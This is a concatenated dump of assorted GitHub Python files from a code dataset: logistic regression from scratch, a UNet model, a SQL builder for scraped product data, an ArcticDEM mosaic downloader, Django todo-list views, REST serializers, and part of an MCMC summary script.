default=1);\n#AddOption('--ha_release', dest='ha_release', help='Set to 1 for building release', type = 'int', default=0);\n\n# parse scons files\n[SConscript(x) for x in all_ss];\n\n","repo_name":"uentity/smadopt","sub_path":"SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"11676081389","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndata = pd.read_csv(\"customer_data.csv\")\r\n#print(data)\r\n#print(f\"null values: {data.isnull().sum()}\")\r\n#data.info()\r\n\r\nz = (data - data.min()) / (data.max() - data.min())\r\n#print(z)\r\n\r\n\r\ncorr1=data.corr()['purchased']\r\nprint(corr1.sort_values())\r\ncorr=data.corr()\r\nsns.heatmap(corr,annot=True)\r\nplt.title('Correlation Matrix', fontsize=16)\r\n#plt.show()\r\n\r\nX = z.drop(columns=['purchased'])\r\nY = z['purchased']\r\n#print(X)\r\n#print(Y)\r\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.25, random_state=None)\r\n\r\n\r\nclass LogisticRegressionFromScratch():\r\n \r\n def fit(self ,x ,y , alpha , epochs=100):\r\n self.inter= np.ones((x.shape[0], 1))\r\n self.x_train = np.concatenate((self.inter, x), axis=1)\r\n self.y_train = y\r\n self.weight = np.zeros(self.x_train.shape[1])\r\n self.alpha = alpha\r\n self.epochs = epochs\r\n for i in range(self.epochs):\r\n z= 
self.sigmoid(self.x_train , self.weight)\r\n #self.loss(z ,self.y_train)\r\n dw= self.gradientDescent(self.x_train , self.y_train , z)\r\n self.weight = self.weight - alpha * dw\r\n return self\r\n\r\n\r\n def predict(self , nx , lamda):\r\n self.inter= np.ones((nx.shape[0], 1))\r\n nx = np.concatenate( (self.inter , nx ), axis=1)\r\n res = self.sigmoid(nx , self.weight)\r\n res = res >= lamda\r\n y_pred = np.zeros(res.shape[0])\r\n for i in range(len(y_pred)):\r\n if res[i] == True: \r\n y_pred[i] = 1\r\n else:\r\n continue\r\n \r\n return y_pred\r\n\r\n\r\n\r\n def sigmoid(self , x , weight):\r\n \r\n return 1.0/(1+np.exp(-np.dot(x , weight)))\r\n\r\n def costFunction(y , hx):\r\n return -1* (np.sum(y*np.log(hx) + (1-y) * np.log(1-hx)))\r\n\r\n def gradientDescent(self , x , y , hx):\r\n return np.dot(x.T, (hx - y)) / y.shape[0]\r\n \r\n def loss(self, hx, y):\r\n return (-y * np.log(hx) - (1 - y) * np.log(1 - hx)).mean()\r\n \r\n def accuracy(y , hx):\r\n return np.sum(y==hx) / len(y)\r\n\r\n\r\nalpha = 0\r\nlist = [0.000000001, 0.1 , 0.01 , 0.001 , 0.0001 , 0.00001 , 0.0000001 ]\r\nmax =0\r\nmodel = LogisticRegressionFromScratch()\r\nfor i in range(len(list)):\r\n #print(i)\r\n \r\n model.fit(x_train ,y_train , list[i] , 10000)\r\n hx =model.predict(x_test , 0.5)\r\n acc = (sum(hx == y_test)) / hx.shape[0]\r\n if acc > max:\r\n max = acc\r\n alpha = list[i]\r\n#model = LogisticRegressionFromScratch()\r\nmodel.fit(x_train , y_train , alpha , 10000)\r\nhx =model.predict(x_test , 0.5)\r\nacc = sum(hx == y_test) / hx.shape[0]\r\n\r\nprint(\"accuracy: \",acc *100)\r\nprint(\"alpha: \",alpha)","repo_name":"Ahmed-Essam-AEE/Car-purchases-prediction-using-logestic-regression","sub_path":"LogisticRegressionSc.py","file_name":"LogisticRegressionSc.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18808385118","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn as nn\nfrom torchvision.utils import save_image\n\n\nclass UNet(nn.Module):\n\n def __init__(self, in_channels=3, out_channels=1, init_features=32, cutpath=False, savefolder=False):\n super(UNet, self).__init__()\n\n features = init_features\n self.cutpath = cutpath\n self.savefolder = savefolder\n self.encoder1 = UNet._block(in_channels, features, name=\"enc1\")\n self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder2 = UNet._block(features, features * 2, name=\"enc2\")\n self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder3 = UNet._block(features * 2, features * 4, name=\"enc3\")\n self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2)\n self.encoder4 = UNet._block(features * 4, features * 8, name=\"enc4\")\n self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2)\n\n self.bottleneck = UNet._block(features * 8, features * 16, name=\"bottleneck\")\n\n self.upconv4 = nn.ConvTranspose2d(\n features * 16, features * 8, kernel_size=2, stride=2\n )\n self.decoder4 = UNet._block((features * 8) * 2, features * 8, name=\"dec4\")\n self.upconv3 = nn.ConvTranspose2d(\n features * 8, features * 4, kernel_size=2, stride=2\n )\n self.decoder3 = UNet._block((features * 4) * 2, features * 4, name=\"dec3\")\n self.upconv2 = nn.ConvTranspose2d(\n features * 4, features * 2, kernel_size=2, stride=2\n )\n self.decoder2 = UNet._block((features * 2) * 2, features * 2, name=\"dec2\")\n self.upconv1 = nn.ConvTranspose2d(\n features * 2, features, kernel_size=2, stride=2\n )\n self.decoder1 = UNet._block(features * 2, 
features, name=\"dec1\")\n\n self.conv = nn.Conv2d(\n in_channels=features, out_channels=out_channels, kernel_size=1\n )\n\n def forward(self, x):\n enc1 = self.encoder1(x)\n enc2 = self.encoder2(self.pool1(enc1))\n enc3 = self.encoder3(self.pool2(enc2))\n enc4 = self.encoder4(self.pool3(enc3))\n\n bottleneck = self.bottleneck(self.pool4(enc4))\n\n if self.cutpath:\n enc1 = torch.zeros_like(enc1)\n enc2 = torch.zeros_like(enc2)\n enc3 = torch.zeros_like(enc3)\n enc4 = torch.zeros_like(enc4)\n dec4 = self.upconv4(bottleneck)\n dec4 = torch.cat((dec4, enc4), dim=1)\n dec4 = self.decoder4(dec4)\n dec3 = self.upconv3(dec4)\n dec3 = torch.cat((dec3, enc3), dim=1)\n dec3 = self.decoder3(dec3)\n dec2 = self.upconv2(dec3)\n dec2 = torch.cat((dec2, enc2), dim=1)\n dec2 = self.decoder2(dec2)\n dec1 = self.upconv1(dec2)\n dec1 = torch.cat((dec1, enc1), dim=1)\n dec1 = self.decoder1(dec1)\n\n if self.savefolder:\n save_image(enc1[0].unsqueeze(1), f'{self.savefolder}/enc1_out.jpg')\n save_image(enc2[0].unsqueeze(1), f'{self.savefolder}/enc2_out.jpg')\n save_image(enc3[0].unsqueeze(1), f'{self.savefolder}/enc3_out.jpg')\n save_image(enc4[0].unsqueeze(1), f'{self.savefolder}/enc4_out.jpg')\n save_image(dec1[0].unsqueeze(1), f'{self.savefolder}/dec1_out.jpg')\n save_image(dec2[0].unsqueeze(1), f'{self.savefolder}/dec2_out.jpg')\n save_image(dec3[0].unsqueeze(1), f'{self.savefolder}/dec3_out.jpg')\n save_image(dec4[0].unsqueeze(1), f'{self.savefolder}/dec4_out.jpg')\n save_image(self.encoder1.enc1conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder1.jpg')\n save_image(self.encoder2.enc2conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder2.jpg')\n save_image(self.encoder3.enc3conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder3.jpg')\n save_image(self.encoder4.enc4conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/encoder4.jpg')\n save_image(self.decoder1.dec1conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder1.jpg')\n save_image(self.decoder2.dec2conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder2.jpg')\n save_image(self.decoder3.dec3conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder3.jpg')\n save_image(self.decoder4.dec4conv1.weight[:,0].unsqueeze(1),f'{self.savefolder}/decoder4.jpg')\n return torch.sigmoid(self.conv(dec1))\n\n @staticmethod\n def _block(in_channels, features, name):\n return nn.Sequential(\n OrderedDict(\n [\n (\n name + \"conv1\",\n nn.Conv2d(\n in_channels=in_channels,\n out_channels=features,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n ),\n (name + \"norm1\", nn.BatchNorm2d(num_features=features)),\n (name + \"relu1\", nn.ReLU(inplace=True)),\n (\n name + \"conv2\",\n nn.Conv2d(\n in_channels=features,\n out_channels=features,\n kernel_size=3,\n padding=1,\n bias=False,\n ),\n ),\n (name + \"norm2\", nn.BatchNorm2d(num_features=features)),\n (name + \"relu2\", nn.ReLU(inplace=True)),\n ]\n )\n )\n\n\nclass wrapped_UNet(nn.Module):\n def __init__(self, unet, in_ch, out_ch):\n super(wrapped_UNet, self).__init__()\n self.unet = unet\n self.conv = nn.Conv2d(in_ch, out_ch, 1)\n\n def forward(self, x):\n x = self.unet(x)\n x = self.conv(x)\n return x\n","repo_name":"sikidaten/crack_segmentation","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":5886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23346409745","text":"#-*-coding:utf-8*-\n\n# class keyword_sql_joint():\n# # sql语句拼接\ndef keywords_insert_sql_joint(data):\n k = []\n v = []\n # m = []\n # n 
= []\n # s = []\n # t = []\n #将下列字段插入到jd_keywords数据表里\n try:\n for key, value in data.items():\n if(key!=\"title\" and key!=\"shop_name\" and key!=\"shop_id\" and key!=\"price\" and key!=\"review_count\" and key!=\"shop_link\" and key!=\"image_url\" and value!=\"\"):\n if (key == \"keyword\" or key=='sku' and value != \"\"):\n # value = value.replace(\"\\\"\", \"\\'\")\n value=value.decode(\"utf-8\").encode(\"utf-8\").strip()\n if (key == \"productpage_url\" or key=='last_update_time' and value != \"\"):\n value=value.encode(\"utf-8\").replace(\"\\n\",\"\").strip()\n if(key=='page_id' or key=='page_position' and value!=\"\"):\n value=value\n k.append(\"`\" + key + \"`\")\n v.append('\"' + str(value) + '\"')\n except Exception as err:\n print (err)\n sql_key = \", \".join(k)\n sql_value = \", \".join(v)\n\n # #将下列字段插入到jd_products数据表中\n # try:\n # for key,value in data.items():\n # if(key!=\"keyword\" and key!=\"productpage_url\" and key!=\"page_id\" and key!=\"page_position\" and key!=\"image_url\" and key!=\"last_update_time\" and value!=\"\" ):\n # if(key=='sku' or key=='title' or key=='shop_name' and value!=\"\"):\n # try:\n # value=value.encode(\"utf-8\").strip()\n # except Exception as err:\n # print err\n # if(key=='price' or key=='review_count' or key=='shop_id' and value!=\"\"):\n # try:\n # value=value.strip()\n # except Exception as err:\n # print err\n # if (key == 'shop_link' and value != \"\"):\n # try:\n # value=value.encode(\"utf-8\").strip()\n # except Exception as err:\n # # print err\n # m.append(\"`\" + key + \"`\")\n # n.append('\"' + str(value) + '\"')\n # except Exception as err:\n # print (err)\n # sql_key1 = \", \".join(m)\n # sql_value1 = \", \".join(n)\n\n # #将下列字段插入到jd_product_image数据表中\n # try:\n # for key,value in data.items():\n # if(key=='sku' and value!=\"\"):\n # value=value.encode(\"utf-8\").strip()\n # s.append(\"`\" + key + \"`\")\n # t.append('\"' + str(value) + '\"')\n # except Exception as err:\n # print err\n # sql_key2 = \", \".join(s)\n # sql_value2 = \", \".join(t)\n\n\n try:\n # 插入到jd_keywords中的sql语句\n sql = 'insert into All_Scraper.jd_keywords(' + sql_key + ') VALUES (' + sql_value + ')'\n # #插入到jd_products数据表中的sql语句\n # sql1= 'insert into All_Scraper.jd_products(' + sql_key1 + ') VALUES (' + sql_value1 + ')'\n # #插入到jd_product_image数据表中的语句\n # sql2='insert into All_Scraper.jd_product_image(' + sql_key2 + ') VALUES (' + sql_value2 + ')'\n return sql\n except Exception as err:\n print (err)\n\n","repo_name":"GinVenXi/All_Scraper","sub_path":"all_scraper/Service/JingDongScraper/sql_joint/keyword_sql_joint.py","file_name":"keyword_sql_joint.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15208183337","text":"#!/usr/bin/env python\n# Filename: download_32m_arcticDEM.py \n\"\"\"\nintroduction: download the mosaci version of ArcticDEM\n\n\nauthors: Huang Lingcao\nemail:huanglingcao@gmail.com\nadd time: 29 April, 2022\n\"\"\"\n\nimport os, sys\nfrom optparse import OptionParser\n\ndeeplabforRS = os.path.expanduser('~/codes/PycharmProjects/DeeplabforRS')\nsys.path.insert(0, deeplabforRS)\nimport vector_gpd\nimport basic_src.map_projection as map_projection\nimport basic_src.io_function as io_function\nimport basic_src.basic as basic\nimport basic_src.RSImageProcess as RSImageProcess\n\n\nfrom ArcticDEM_unpack_registration import process_dem_tarball\n\n# for '2m', should use download_arcticDEM.py to 
download\nmosaic_res_to_name={10:'10m',32:'32m',100:'100m',500:'500m', 1000:'1km'}\n\ndef wget_file_url(url,save_path):\n # --continue, continue if the previous attempt failed\n cmd_str = 'wget --continue --no-check-certificate --output-document=%s %s' % (save_path,url)\n status, result = basic.exec_command_string(cmd_str)\n return status, result\n\ndef download_tarball_for_one_polygon(tarball_dir,tile_tif_dir,url_head,tile_list, mosaic_res=2):\n for idx, tile_num in enumerate(tile_list):\n dem_name = tile_num + '_' + mosaic_res_to_name[mosaic_res]+'_v3.0'\n tarball_name = dem_name + '.tar.gz'\n tiff_name = dem_name + '_reg_dem.tif'\n tiff_path = os.path.join(tile_tif_dir,tiff_name)\n tarball_path = os.path.join(tarball_dir, tarball_name)\n # print(tiff_path)\n if os.path.isfile(tiff_path) or os.path.isfile(tarball_path):\n print('geotiff or tarball for %s already exists, skip downloading'%dem_name)\n else:\n # download\n url = url_head + tile_num + '/'+tarball_name\n wget_file_url(url,tarball_path)\n\n # unpack\n tar_list = [tarball_path]\n work_dir = './'\n b_rm_inter = True\n b_rm_tarball = False\n process_dem_tarball(tar_list, work_dir, tile_tif_dir, remove_inter_data=b_rm_inter, rm_tarball=b_rm_tarball,\n apply_registration=False)\n\n\ndef create_a_mosaic(pre_name,extent_id,save_dir,extent_poly,tile_list,tile_tif_dir,mosaic_res=2):\n\n # create mosaic\n tif_list = []\n for idx, tile_num in enumerate(tile_list):\n dem_name = tile_num + '_' + mosaic_res_to_name[mosaic_res] + '_v3.0'\n tiff_name = dem_name + '_reg_dem.tif'\n tiff_path = os.path.join(tile_tif_dir,tiff_name)\n if os.path.isfile(tiff_path) is False:\n raise ValueError('%s not exists'%tiff_path)\n tif_list.append(tiff_path)\n\n thread_num = 8\n output_mosaic = os.path.join(save_dir,pre_name + '_ArcticDEM_mosaic_%d'% extent_id + '.tif')\n # create mosaic, can handle only input one file, but is slow\n if os.path.isfile(output_mosaic) is False:\n result = RSImageProcess.mosaic_crop_images_gdalwarp(tif_list, output_mosaic, resampling_method='average',\n o_format='GTiff',\n compress='lzw', tiled='yes', bigtiff='if_safer',\n thread_num=thread_num)\n else:\n print('mosaic: %s exist, skip'%output_mosaic)\n # crop\n output_crop = os.path.join(save_dir,pre_name + '_ArcticDEM_mosaic_%d_crop'% extent_id + '.tif')\n if os.path.isfile(output_crop) is False:\n RSImageProcess.subset_image_by_polygon_box_image_min(output_crop, output_mosaic, extent_poly, resample_m='average',\n o_format='GTiff',\n xres=mosaic_res, yres=mosaic_res, compress='lzw', tiled='yes',\n bigtiff='if_safer', thread_num=thread_num)\n else:\n print('Crop: %s exist, skip'%output_crop)\n\n\ndef main(options, args):\n extent_shp = args[0]\n dem_index_shp = args[1]\n mosaic_res = options.mosaic_resolution\n if mosaic_res not in mosaic_res_to_name.keys():\n raise ValueError('Only accept resolutions in %s'%str([item for item in mosaic_res_to_name.keys()]))\n\n save_folder = options.save_dir + '_' +mosaic_res_to_name[mosaic_res]\n if os.path.isdir(save_folder) is False:\n io_function.mkdir(save_folder)\n save_folder = os.path.abspath(save_folder) # change to absolute path\n\n tarball_dir = os.path.expanduser('ArcticDEM_tile_tarball')\n dem_tif_dir = os.path.expanduser('ArcticDEM_tile_geotiff')\n if os.path.isdir(tarball_dir) is False:\n io_function.mkdir(tarball_dir)\n if os.path.isdir(dem_tif_dir) is False:\n io_function.mkdir(dem_tif_dir)\n\n # extent polygons and projection (proj4)\n extent_shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(extent_shp)\n 
dem_shp_prj = map_projection.get_raster_or_vector_srs_info_proj4(dem_index_shp)\n\n if extent_shp_prj != dem_shp_prj:\n basic.outputlogMessage('%s and %s do not have the same projection, will reproject %s'\n %(extent_shp,dem_index_shp,os.path.basename(extent_shp)))\n epsg = map_projection.get_raster_or_vector_srs_info_epsg(dem_index_shp)\n # print(epsg)\n # extent_polys = vector_gpd.read_shape_gpd_to_NewPrj(extent_shp,dem_shp_prj.strip())\n extent_polys = vector_gpd.read_shape_gpd_to_NewPrj(extent_shp,epsg)\n else:\n extent_polys = vector_gpd.read_polygons_gpd(extent_shp)\n\n poly_ids = [idx for idx in range(len(extent_polys))]\n extent_name = os.path.splitext(os.path.basename(extent_shp))[0]\n\n # read dem polygons and tile number\n dem_polygons, dem_tiles = vector_gpd.read_polygons_attributes_list(dem_index_shp, 'tile',b_fix_invalid_polygon=False)\n\n for count, (idx, ext_poly) in enumerate(zip(poly_ids, extent_polys)):\n basic.outputlogMessage('get data for the %d th extent (%d/%d)' % (idx, count, len(extent_polys)))\n\n save_txt_path = extent_name +'-'+ 'dem_tiles_poly_%d.txt' % idx\n if os.path.isfile(save_txt_path):\n tiles = io_function.read_list_from_txt(save_txt_path)\n basic.outputlogMessage('read %d dem tiles from %s' % (len(tiles),save_txt_path))\n else:\n # get fileurl\n dem_poly_ids = vector_gpd.get_poly_index_within_extent(dem_polygons,ext_poly)\n basic.outputlogMessage('find %d DEM within %d th extent' % (len(dem_poly_ids), (idx)))\n tiles = [dem_tiles[id] for id in dem_poly_ids]\n\n # save to txt\n io_function.save_list_to_txt(save_txt_path, tiles)\n basic.outputlogMessage('save dem urls to %s' % save_txt_path)\n\n # download and create a mosaic\n url_head = 'https://data.pgc.umn.edu/elev/dem/setsm/ArcticDEM/mosaic/v3.0/%s/'%mosaic_res_to_name[mosaic_res]\n download_tarball_for_one_polygon(tarball_dir, dem_tif_dir, url_head, tiles,mosaic_res=mosaic_res)\n\n # create a mosaic\n extent_name_idx = extent_name + '_%d'%idx\n create_a_mosaic(extent_name_idx, idx, save_folder, ext_poly,tiles,dem_tif_dir,mosaic_res=mosaic_res)\n\n\n\nif __name__ == '__main__':\n usage = \"usage: %prog [options] extent_shp dem_indexes_shp\"\n parser = OptionParser(usage=usage, version=\"1.0 2020-12-25\")\n parser.description = 'Introduction: download ArcticDEM mosaic within an extent at other resolution '\n\n parser.add_option(\"-d\", \"--save_dir\",\n action=\"store\", dest=\"save_dir\", default='ArcticDEM_mosaic',\n help=\"the folder to save DEMs\")\n\n parser.add_option(\"-r\", \"--mosaic_resolution\",\n action=\"store\", dest=\"mosaic_resolution\", type=int, default=10,\n help=\"the resolution of mosaic to download: 10, 32, 100, 500,1000\")\n\n\n (options, args) = parser.parse_args()\n if len(sys.argv) < 2 or len(args) < 1:\n parser.print_help()\n sys.exit(2)\n\n main(options, args)\n","repo_name":"yghlc/rs_data_proc","sub_path":"DEMscripts/download_arcticDEM_mosaic_resolution.py","file_name":"download_arcticDEM_mosaic_resolution.py","file_ext":"py","file_size_in_byte":7965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"36922118887","text":"import os\nimport matplotlib.pyplot as plt\nimport sys\n\n\ndef get_path():\n dirpath = os.getcwd()\n print(\"Current directory is : \" + dirpath)\n foldername = os.path.basename(dirpath)\n print(\"Current folder name is : \" + foldername)\n scriptpath = os.path.abspath(os.path.dirname(sys.argv[0]))\n print(\"Absolute script path is : \" + scriptpath)\n lib_path = input (\"Enter the directary 
which store the in-house packages for fast instllation of modules. Otherwise, enter quit: \")\n if lib_path == 'quit':\n return\n else:\n sys.path.append(str(lib_path))\n print(\"\\n An installation-dependent list of packages directories configured at the time virenv Python is used: \")\n return sys.path\n\n\nif __name__ == '__main__':\n get_path()\n\n\n\n\n\n\n\n\n\n","repo_name":"kalufinnle/acs","sub_path":"exec_get_path.py","file_name":"exec_get_path.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13995248821","text":"from turtle import title\nfrom django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import login_required\nfrom todolist.models import Task\nfrom todolist.forms import TaskForm\nfrom datetime import date\nfrom django.http import HttpResponse\nfrom django.core import serializers\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\n\n@login_required(login_url='/todolist/login/')\ndef show_todolist_ajax(request):\n data = Task.objects.filter(user=request.user).all()\n context = {\n 'todo_list': data,\n } \n return render(request, \"todolist.html\", context)\n\ndef show_json(request):\n data = Task.objects.filter(user=request.user).all()\n return HttpResponse(serializers.serialize(\"json\", data), content_type=\"application/json\")\n\ndef add_task(request):\n if request.method == 'POST':\n title = request.POST.get('title')\n description = request.POST.get('description')\n new_task = Task(\n date=str(date.today()),\n title=title, \n description=description,\n user=request.user,\n )\n new_task.save()\n return HttpResponse(\n ''\n )\n return redirect('todolist:show_todolist_ajax')\n \n\ndef create_task(request):\n form = TaskForm()\n if request.method == 'POST':\n form = TaskForm(request.POST)\n if form.is_valid():\n task = Task(\n date = str(date.today()),\n title = form.cleaned_data[\"task_title\"],\n description = form.cleaned_data[\"task_description\"],\n user = request.user,\n )\n task.save()\n messages.success(request, 'Task berhasil dibentuk')\n return redirect('todolist:show_todolist')\n context = {\"form\": form}\n return render(request, 'create_task.html', context)\n\ndef delete_task(request, id):\n Task.objects.get(pk=id).delete()\n return redirect('todolist:show_todolist_ajax')\n\ndef change_status(request, id):\n task = Task.objects.get(pk=id) \n if (not task.is_finished):\n task.is_finished = True\n task.save()\n return redirect('todolist:show_todolist_ajax')\n\ndef register(request):\n form = UserCreationForm()\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save() \n messages.success(request, 'Akun telah berhasil dibuat!')\n return redirect('todolist:login')\n \n context = {'form':form}\n return render(request, 'register.html', context)\n\ndef login_user(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('todolist:show_todolist_ajax')\n else:\n messages.info(request, 'Username atau Password salah!')\n context = {}\n return render(request, 'login.html', context)\n\ndef 
logout_user(request):\n logout(request)\n messages.info(request, 'Berhasil logout')\n return redirect('todolist:login')\n\n\n\n\n\n\n","repo_name":"devinahana/Tugas2","sub_path":"todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1877223846","text":"from rest_framework import serializers\nfrom rest_framework.relations import PrimaryKeyRelatedField\n\nfrom accounts.serializers import AccountSerializer\nfrom categories.models import SubCategory, MainCategory\nfrom categories.serializers import SubCategorySerializer\nfrom transactions.models import Transaction\n\n\nclass TransactionDetailsSerializer(serializers.ModelSerializer):\n subcategory = SubCategorySerializer()\n account = AccountSerializer()\n\n class Meta:\n model = Transaction\n fields = (\n 'note',\n 'amount',\n 'subcategory',\n 'account',\n 'id',\n 'created',\n )\n read_only_fields = (\n 'created',\n 'id',\n 'subcategory',\n 'account'\n )\n\n\nclass TransactionSerializer(serializers.ModelSerializer):\n subcategory = PrimaryKeyRelatedField(queryset=SubCategory.objects.all())\n account = PrimaryKeyRelatedField(queryset=MainCategory.objects.all())\n\n class Meta:\n model = Transaction\n fields = (\n 'note',\n 'amount',\n 'subcategory',\n 'account',\n 'id',\n )\n read_only_fields = (\n 'created',\n 'id',\n 'subcategory',\n 'account'\n )\n\n def to_representation(self, instance):\n self.fields['subcategory'] = SubCategorySerializer()\n self.fields['account'] = AccountSerializer()\n return super(TransactionSerializer, self).to_representation(instance)\n","repo_name":"ddomeb/yaba","sub_path":"source/yaba/transactions/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33403668766","text":"from __future__ import division\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom builtins import range\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom collections import OrderedDict\nimport pandas as pd\n\ndef hpd(trace, mass_frac):\n \"\"\"\n Returns highest probability density region given by\n a set of samples.\n \n From:\n http://bebi103.caltech.edu.s3-website-us-east-1.amazonaws.com/2015/tutorials/l06_credible_regions.html\n\n Parameters\n ----------\n trace : array\n 1D array of MCMC samples for a single variable\n mass_frac : float with 0 < mass_frac <= 1\n The fraction of the probability to be included in\n the HPD. 
For example, `massfrac` = 0.95 gives a\n 95% HPD.\n \n Returns\n -------\n output : array, shape (2,)\n The bounds of the HPD\n \"\"\"\n # Get sorted list\n d = np.sort(np.copy(trace))\n\n # Number of total samples taken\n n = len(trace)\n \n # Get number of samples that should be included in HPD\n n_samples = np.floor(mass_frac * n).astype(int)\n \n # Get width (in units of data) of all intervals with n_samples samples\n int_width = d[n_samples:] - d[:n-n_samples]\n \n # Pick out minimal interval\n min_int = np.argmin(int_width)\n \n # Return interval\n return np.array([d[min_int], d[min_int+n_samples]])\n\n\ndef get_summary(d, lls, cifrac = 0.95):\n med = np.median(d)\n mean = np.mean(d)\n max_idx = np.argmax(lls)\n mapest = d[max_idx]\n hpdl, hpdh = hpd(d, cifrac)\n return mapest, mean, med, hpdl, hpdh\n\nparser = argparse.ArgumentParser(\n description='do some analyses of paper example data')\nparser.add_argument('datafile', help = 'data filename, from mope run')\nparser.add_argument('--frac-burnin', '-b', type = float,\n help = 'fraction of data to consider burnin [0.3]',\n default = 0.3)\nparser.add_argument('--old', action ='store_true',\n help = 'specify for old data, drift in natural scale')\nparser.add_argument('--m2', action = 'store_true',\n help = 'use summary statistics from newer data')\nparser.add_argument('--no-change', action = 'store_true',\n help = 'include pointmass at zero')\nparser.add_argument('--lowers', help = 'file with parameter lower limits, one per line')\nargs = parser.parse_args()\n\ndat = pd.read_csv(args.datafile, sep = '\\t', header = 0, comment = '#')\n\nif args.no_change and not args.old:\n # get lowers\n if args.lowers is None:\n lowers = []\n with open(args.datafile) as fin:\n foundlower = False\n for line in fin:\n line = line.strip()\n if 'lower' in line:\n foundlower = True\n continue\n if foundlower:\n if 'upper' in line:\n break\n lowers.append(float(line.split(' ')[-1]))\n else:\n with open(args.lowers) as fin:\n lowers = []\n for line in fin:\n lowers.append(float(line.strip()))\n\n num_length_cols = dat.columns.str.endswith('_l').sum()\n for i in range(num_length_cols):\n low = lowers[i]\n col = dat.columns[i+1] # i+1 because first column is log-likelihood!\n dat.loc[dat[col] < low+1, col] = -np.inf\n\n# convert drift back to natural units\nif not args.old:\n dat.loc[:,dat.columns.str.contains('_l')] = 10**dat.loc[:,dat.columns.str.contains('_l')]\nelse:\n dat.loc[:,dat.columns.str.contains('_l')] = dat.loc[:,dat.columns.str.contains('_l')].abs()\n dat.loc[:,dat.columns.str.contains('_m')] = 10**(-1.0*dat.loc[:,dat.columns.str.contains('_m')].abs())\nburn_idx = int(dat.shape[0] * args.frac_burnin)\ndat_burn = dat.iloc[burn_idx:,:]\n\n# calculate EBSs\n\n# update the new statistic when all of the data is included\nif args.m2:\n mean_age = 29.192876\nelse:\n mean_age = 29.558974\n\n\nif args.m2:\n bots_mean = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + mean_age*dat_burn['loo_l']).values\n bots_18 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 18*dat_burn['loo_l']).values\n bots_40 = 2.0/(dat_burn['eoo_pre_l'] + dat_burn['eoo_post_l'] + dat_burn['som_l'] + 40*dat_burn['loo_l']).values\nelse:\n bots_mean = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + mean_age*dat_burn['loo_l'])).values\n bots_18 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 18*dat_burn['loo_l'])).values\n bots_40 = (2.0/(2.0/dat_burn['eoo_l'] + \n dat_burn['som_l'] + 40*dat_burn['loo_l'])).values\n\n\n# 
